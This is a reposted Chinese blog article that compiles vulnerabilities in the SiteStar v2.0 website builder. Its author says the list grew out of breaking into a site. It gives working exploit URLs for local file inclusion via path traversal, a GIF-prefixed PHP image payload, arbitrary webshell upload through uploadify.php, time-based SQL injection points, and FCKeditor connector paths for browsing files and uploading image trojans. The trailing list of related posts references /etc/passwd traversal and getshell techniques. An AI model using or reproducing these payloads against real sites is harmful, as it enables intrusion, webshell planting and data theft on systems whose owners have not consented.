uploadify.php 漏洞,建站之星 (SiteStar) v2.0 漏洞大全,上传、注入、任意文件包含(转 )...

最新推荐文章于 2023-12-30 09:15:18 发布
最新推荐文章于 2023-12-30 09:15:18 发布
阅读量383 收藏
点赞数
文章标签: uploadify.php 漏洞

原文http://lcx.cc/?i=2324

前两天拿个站,

系统是:建站之星 (SiteStar)

v2.0,自己看了看,又综合了网上的各种漏洞,整理了一份漏洞大全,这套程序浑身都是窟窿,无语中……

记录时间:

2012-3-10 14:24:43

By: Nuclear'Atk, Url: Http://lcx.cc/

程序名称:

建站之星 (SiteStar) v2.0

建站之星 SiteStar 网站管理系统 v2.0

漏洞详情:

1、本地任意文件包含漏洞:

http://127.0.0.1/index.php?_m=/../robots.txt.htmlmod_product&_a=prdlist

详细:http://lcx.cc/?FoxNews=2319.html    问题出在:/library/content.PHP,

行:14。

利用:配合文件上传,上传图片,可以瞬间拿下。

图片:GIF89a<?php phpinfo();?>

2、在线编辑器:

http://127.0.0.1/admin/fckeditor/editor/fckeditor.html

可以上传图片、浏览文件、新建文件夹等。

3、任意文件上传漏洞:

漏洞产生在 /script/multiupload/uploadify.php 文件。

低级失误,通过构造html表单可直接上传webshell至web目录。

详细:http://lcx.cc/?FoxNews=2320.html

4、Sql 注入漏洞:

地址:

http://192.168.1.2/index.php?_m=mod_product&_a=prdlist&cap_id=46%Inject_Here%

http://192.168.1.2/index.php?_m=mod_product&_a=view&p_id=56%Inject_Here%

数据库类型:MySQL time based injection

参数类型:Integer

其他漏洞:

路径 {

http://127.0.0.1/admin/

http://127.0.0.1/admin/index.php

http://127.0.0.1/admin/FCKeditor/

http://127.0.0.1/admin/fckeditor/editor/fckeditor.html

}

漏洞 {

任意文件包含:http://127.0.0.1/index.php?_m=/../robots.txt.htmlmod_product&_a=prdlist

Sql

注入漏洞:http://127.0.0.1/index.php?_m=mod_product&_a=prdlist&cap_id=37%Inject_Here%

}

编辑器 {

编辑器:http://127.0.0.1/admin/fckeditor/editor/fckeditor.html

上传:http://127.0.0.1/admin/fckeditor/browser/browser.html?Connector=connector.php

包含:http://127.0.0.1/index.php?_m=/../index.php.htmlmod_product&_a=prdlist

文件浏览:http://127.0.0.1/admin/fckeditor/browser/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/

上传路径:/admin/fckeditor/browser/../../../upload/file/baidu_sylogo1.gif

可以创建 a.asp 目录,上传图片木马。

各种路径(太多了,只记了部分) {

/admin/fckeditor/browser/browser.html?Connector=connector.php

/admin/fckeditor/browser/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/

/admin/fckeditor/browser/connector.php?Command=GetFoldersAndFiles&Type=Flash&CurrentFolder=/

/admin/fckeditor/browser/connector.php?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=/

}

}

weixin_39709979
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Hvv最新漏洞POC集合——持续更新
wuli1024的博客
01-10 1189
Weaver E-Office9版本存在代码问题漏洞,该漏洞源于文件/inc/jquery/uploadify/uploadify.php存在问题,对参数Filedata的操作会导致不受限制的上传
php漏洞 wvs,建站之星sitestar v2.5文件包含漏洞利用及修复
weixin_28869849的博客
03-10 337
该楼层疑似违规已被系统折叠隐藏此楼查看此楼无意间发现建站之星sitestar 的一鸡肋文件包含漏洞,WVS扫描一朋友的网站,发现提示有以下文件包含漏洞index.php?_a=fullist&_m=../../../../../../../../../../etc/passwd%00.jpgadmin/index.php?_a=admin_list&_m=../../../../...
建站之星php 漏洞,建站之星模糊测试实战之任意文件上传漏洞
weixin_39830012的博客
04-04 266
0x00 Sitestar美橙互联又一力作,建站之星专业版(Sitestar Pro),无拘无束,信手拈来,创意无限,不拘一格,轻松创建属于您自己的网站!0x01 漏洞的产生/module/mod_tool.php 第89行起,img_create()函数[php]public function img_create() {$file_info =& ParamHolder::get('i...
建站之星php 漏洞,建站之星任意文件上传漏洞
weixin_34229578的博客
04-04 288
#1 漏洞产生/module/mod_media.phpflash_picker() 和 image_picker() 两个函数image_picker() 函数$typeArr = array('image/jpeg','image/pjpeg');$flash_typeArr = array('image/jpeg','image/pjpeg');$file_info =& Param...
建站之星php 漏洞,建站之星全版本后台通杀getshell的解析与解决方法
weixin_33478634的博客
04-04 194
找到一个fck改的编辑器,准备用解析洞日之。然后发现无法这玩意直接过滤了“.”创建不了解析文件夹,反复试了几次之后发现这个过滤是有延迟的。大概在0.1秒后 才会去掉。于是果断查看源码看函数:复制代码代码如下:function addSort(obj) {$(obj).parent().find(‘span’).css(‘display’,'inline-block’);$(obj).css(‘di...
jquery文件上传插件 jquery.uploadify.js
02-14
《jQuery文件上传插件jQuery.uploadify.js:跨越浏览器限制的智能解决方案》 在Web开发中,文件上传功能是一项常见的需求,而jQuery.uploadify.js是一款高效且用户友好的文件上传插件,尤其对于需要兼容多种浏览器...
php+jQuery.uploadify实现文件上传教程
01-21
这两天用上传的控件,PHP+Jquery今天先介绍这个uploadify,嗯,我今天下载因为我英文不是很好所以我就在网上找的使用教程,我发现好多用不了,我那个去,你看官方文档才知道很多API已经不是以前的API了。今天总结...
jquery文件上传插件 jquery.uploadify.js 不支持IE10现在经过修改
03-10
在IT行业中,jQuery Uploadify.js是一款非常流行的前端文件上传插件,它允许用户通过异步方式上传文件到服务器,提供了一种友好的用户体验。然而,随着浏览器版本的更新,一些较旧的插件可能不再兼容新的浏览器,...
ASP.NET MVC4 利用uploadify.js多文件上传
10-20
本文主要介绍了ASP.NET MVC4利用uploadify.js实现多文件上传的方法代码。具有很好的参考价值。下面跟着小编一起来看下吧
手工漏洞挖掘渗透某服务器
最新发布
Python_0011的博客
12-30 908
通过nslookup对 qd.******.*****.cn进行查询,如图1所示,获取的信息是cdn,无法获取真实IP地址信息,后面通过https://www.yougetsignal.com/tools/web-sites-on-web-server/进行域名查询,每次查询的域名对应IP地址结果都在变化,说明用了cdn加速技术。url=qd.******.*****.cn#last_reboot,其结果如图2所示,IP地址为122.72.**.1**。真实密码为1-32位字符串,将其进行md5解密即可。
uploadifive 文件上传插件-修改版
12-18
根据uploadifive-v1.2.2修改: 1. 鼠标悬停在按钮上时,由指针变成手 2. onQueueCompelete,队列全部上传完毕后未出发该事件,现修复 3. clearQueue及取消某个文件上传时,由原来的即刻消失,变为等待3秒再消失
sitefactory3.6企业版
08-02
sitefactory 3.6 企业版,绝对能使用的正式版
uploadify上传无反应_取证实战—Hacker利用某类网站的文件上传漏洞批量渗透
weixin_39662611的博客
12-13 723
下面讲的会是一个比较有趣的故事,某类Web网站系统因为存在文件上传漏洞文件包含漏洞,被Hacker利用后进行了批量的渗透,造成一大部分网站的后台被植入后门,对相关企事业单位造成不良影响。0x01概述其实,这个漏洞就是由于对于上传的文件校验不够严格,导致出现了文件上传漏洞,同时利用了网站存在的文件包含漏洞,使得Hacker能够获取Webshell得到的信息如下,以下内容为从Hacker电...
uploadify上传无反应_【取证实战】Hacker利用某类网站的文件上传漏洞批量渗透
weixin_39637260的博客
12-13 179
来源:电子取证及可信应用协创中心,作者:Hayden某类Web网站系统因为存在文件上传漏洞文件包含漏洞,被Hacker利用后进行了批量的渗透,造成一大部分网站的后台被植入后门,对相关企事业单位造成不良影响。0x01概述其实,这个漏洞就是由于对于上传的文件校验不够严格,导致出现了文件上传漏洞,同时利用了网站存在的文件包含漏洞,使得Hacker能够获取Webshell得到的信息如下,以下内...
wordpress漏洞上传php文件,WordPress Foxypress插件\'uploadify.php\'任意文件上传漏洞
weixin_39535125的博客
03-09 359
WordPress Foxypress插件\'uploadify.php\'任意文件上传漏洞信息来源:Sammy Forgit 发表日期:2013-05-01 14:59:00FoxyPress是WordPress博客软件插件。Foxypress 0.4.1.1-0.4.2.1版本的wp-content/plugins/foxypress/uploadify/uploadify.php脚...
web-网站被黑
MIGENGKING的博客
03-19 433
解题思路:打开链接是一个黑页,链接后面加index.php判断是PHP 解析:满足一些条件不会退出的参考漏洞建站之星 Sitestar 前台 Getshell 一枚包含漏洞1.本地文件包含很多都限制了包含的后缀结尾必须为.php,例如,需要截断后面的截取字符判断是不是 .php用 zip (或者 phar )协议绕过首先新建一个 1.php,里面 phpinfo,然后压缩成 .zip...
FCKeditor报IIS路径
weixin_30681121的博客
03-18 94
报IIS路径http://www.xxx.com/FCKeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=~/ 载于:https://www.cnblogs.com/mujj/articles/3608574.htm...
uploadifive 小例子
清叶 的专栏
01-03 1946
$('#upload_files').uploadifive({        'uploadScript':'上传目的地址',        'buttonText':'选择文件',        'multi':true, 'auto':false, 'fileObjName': 'filedata', //后台接收file参数        'onUp
动易html在线编辑器 漏洞,动易网站漏洞总结
weixin_33895652的博客
05-30 497
动易漏洞总结方法1:注册用户 keio.asAhttp://xtfhzx.com/reg/user_reg.asp上传jpg马http://www.URL.com/user/Upload.asp?dialogtype=UserBlogPic&size=5方法2:先暴所有管理员帐号。/Region.asp?Country=tt&City=whytt&Province=shi'...
ASP.NET MVC4:使用uploadify.js实现多文件上传教程
"本文档主要介绍了如何在ASP.NET MVC4中利用uploadify.js库实现多文件上传功能。首先,文档详细地提供了HTML和CSS代码,用于创建一个用户友好的文件上传界面。包括一个包含文件选择区的`#upDiv`,以及用于显示上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值